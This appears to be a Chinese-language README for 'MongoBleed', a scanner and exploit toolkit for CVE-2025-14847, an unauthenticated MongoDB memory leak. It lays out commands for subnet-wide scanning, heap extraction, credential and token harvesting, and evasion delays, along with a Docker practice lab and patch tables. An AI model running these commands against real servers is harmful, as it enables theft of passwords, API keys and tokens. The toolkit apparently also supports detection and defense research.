CVE-2025-14847 扫描器与利用工具包
这是一个针对 MongoBleed 的安全研究工具包——一个 MongoDB zlib 解压过程中的严重未认证内存泄漏漏洞,攻击者可借此在无需认证的情况下从服务器堆内存中提取敏感数据。
╔╦╗┌─┐┌┐┌┌─┐┌─┐╔╗ ┬ ┌─┐┌─┐┌┬┐
║║║│ │││││ ┬│ │╠╩╗│ ├┤ ├┤ ││
╩ ╩└─┘┘└┘└─┘└─┘╚═╝┴─┘└─┘└─┘─┴┘
CVE-2025-14847 Scanner & Exploit
# No external dependencies -- Python 3 standard library only
cd cli
# Detect if a target is vulnerable (default action)
python mongobleed.py -t localhost:27017
# Scan an entire subnet
python mongobleed.py -t 192.168.1.0/24
# Extract memory and parse for credentials
python mongobleed.py -t target:27017 -e --credentials
# Safe mode -- detection only, no exploitation
python mongobleed.py -t target:27017 -s
MongoBleed/
├── cli/ # Command-line scanner and exploitation tool
│ ├── mongobleed.py # Main CLI tool
│ ├── requirements.txt # Python dependencies (stdlib only)
│ └── README.md # CLI documentation
├── lab/ # Docker-based CTF lab environment
│ ├── docker-compose.yml # Multi-container lab setup
│ ├── vulnerable/ # Vulnerable MongoDB configurations
│ ├── patched/ # Patched MongoDB for comparison
│ ├── no-zlib/ # Non-exploitable (zlib disabled)
│ ├── monitoring/ # Attack visualization dashboard
│ ├── warmup-heap.sh # Populate heap with sensitive data
│ └── README.md # Lab setup instructions
├── nuclei/ # Nuclei scanning templates
│ ├── CVE-2025-14847.yaml # Active exploitation template
│ ├── CVE-2025-14847-safe.yaml # Safe detection template
│ └── README.md # Nuclei template docs
├── docs/ # Educational documentation
│ ├── README.md # Learning path index
│ ├── 01-fundamentals.md # MongoDB & memory basics
│ ├── 02-vulnerability.md # CVE-2025-14847 deep dive
│ ├── 03-exploitation.md # Hands-on exploitation
│ ├── 04-detection.md # Hunting and detection
│ └── 05-defense.md # Mitigation strategies
└── README.md # This file
192.168.1.0/24、10.0.0.0/16:27018)# Check single target
python mongobleed.py -t localhost:27017
# Check with verbose output
python mongobleed.py -t localhost:27017 -v
# Safe mode -- detection only, never sends exploit payload
python mongobleed.py -t localhost:27017 -s
# Show version info
python mongobleed.py -t localhost:27017 --version
# Scan a /24 subnet
python mongobleed.py -t 192.168.1.0/24
# CIDR with custom port
python mongobleed.py -t 10.0.0.0/24:27018
# Scan from target file (CIDR ranges in file are expanded)
python mongobleed.py -T targets.txt -j 20 -o results.json
# Target file can contain IPs, host:port, and CIDR ranges
cat targets.txt
# 192.168.1.100:27017
# 10.0.0.0/24
# mongodb.internal:27017
# Extract memory (default offset range 20-8192)
python mongobleed.py -t target:27017 -e
# Custom offset range
python mongobleed.py -t target:27017 -e --min-offset 20 --max-offset 500
# Continuous extraction (Ctrl+C to stop)
python mongobleed.py -t target:27017 --continuous
# Force extraction even if version check is inconclusive
python mongobleed.py -t target:27017 -e --force
# Parse leaked memory for credentials and secrets
python mongobleed.py -t target:27017 -e --credentials
# Parse for tokens specifically
python mongobleed.py -t target:27017 -e --tokens
# Extract printable strings
python mongobleed.py -t target:27017 -e --strings
# Hexdump output
python mongobleed.py -t target:27017 -e --hexdump
# Add delay between requests (milliseconds)
python mongobleed.py -t target:27017 -e --delay 500
# Random jitter on delay
python mongobleed.py -t target:27017 -e --delay 1000 --jitter
# Safe detection only
nuclei -t nuclei/CVE-2025-14847-safe.yaml -u mongodb://localhost:27017
# Active detection
nuclei -t nuclei/CVE-2025-14847.yaml -u mongodb://localhost:27017
# Scan multiple targets
nuclei -t nuclei/ -l targets.txt
# Start all containers
cd lab && docker compose up -d
# Services:
# - localhost:27017 MongoDB 4.4.29 (Vulnerable + zlib)
# - localhost:27018 MongoDB 6.0.26 (Vulnerable + zlib)
# - localhost:27019 MongoDB 8.0.16 (Vulnerable + zlib)
# - localhost:27020 MongoDB 8.0.17 (Patched)
# - localhost:27021 MongoDB 8.0.16 (No zlib - not exploitable)
# - localhost:8080 Monitoring Dashboard
# Warm up heap with sensitive data before exploitation
./warmup-heap.sh 27017 50
# Run exploit against lab
cd ../cli
python mongobleed.py -t localhost:27017 -e --credentials
Target:
-t, --target TARGET Target host:port or CIDR range (e.g. 192.168.1.0/24)
-T, --targets FILE File with target list (supports CIDR per line)
Detection:
--detect Detect if target is vulnerable (default action)
--version Show MongoDB version
-s, --safe Safe mode - detection only, no exploitation
Exploitation:
-e, --extract Extract memory via offset scanning
--min-offset N Minimum offset to probe (default: 20)
--max-offset N Maximum offset to probe (default: 8192)
--continuous Continuous extraction mode
--force Force extraction even if version check fails
Analysis:
--credentials Parse for credentials
--tokens Parse for tokens
--strings Extract printable strings
--hexdump Display hexdump
Evasion:
--delay MS Delay between requests (milliseconds)
--jitter Random delay jitter
Output:
-o, --output FILE Output file (JSON)
-v, --verbose Verbose output
-q, --quiet Quiet mode
--json JSON output
--no-color Disable colors
Connection:
--timeout SECS Connection timeout (default: 10)
-j, --threads N Threads for batch scanning (default: 10)
该工具会在提取的内存中搜索以下模式:
| 类型 | 示例模式 |
|---|---|
| password | password: value, passwd=value |
| secret | secret: value |
| api_key | api_key: sk_live_... |
| token | token: ... (16+ chars) |
| bearer_token | Bearer eyJ... |
| jwt | eyJ... (Base64 JWT) |
| mongodb_uri | mongodb://user:pass@host |
| postgres_uri | postgresql://... |
| redis_uri | redis://... |
| stripe_key | sk_live_... |
| openai_key | sk-... (48+ chars) |
| aws_access_key | AKIA... |
| github_token | ghp_... |
| slack_token | xoxb-..., xoxp-... |
| ctf_flag | FLAG{...} |
| 项目 | 值 |
|---|---|
| CVE | CVE-2025-14847 |
| 名称 | MongoBleed |
| CWE | CWE-130(长度参数处理不当) |
| CVSS | 8.7(高危) |
| 类型 | 未认证内存泄漏 |
| 披露日期 | 2025 年 12 月 19 日 |
| 野外利用 | 2025 年 12 月 29 日 |
| 分支 | 受影响版本 | 已修复版本 |
|---|---|---|
| 8.2.x | 8.2.0 - 8.2.2 | 8.2.3 |
| 8.0.x | 8.0.0 - 8.0.16 | 8.0.17 |
| 7.0.x | 7.0.0 - 7.0.27 | 7.0.28 |
| 6.0.x | 6.0.0 - 6.0.26 | 6.0.27 |
| 5.0.x | 5.0.0 - 5.0.31 | 5.0.32 |
| 4.4.x | 4.4.0 - 4.4.29 | 4.4.30 |
| 4.2.x | 所有版本 | 已停止支持 - 无补丁 |
| 4.0.x | 所有版本 | 已停止支持 - 无补丁 |
| 3.6.x | 所有版本 | 已停止支持 - 无补丁 |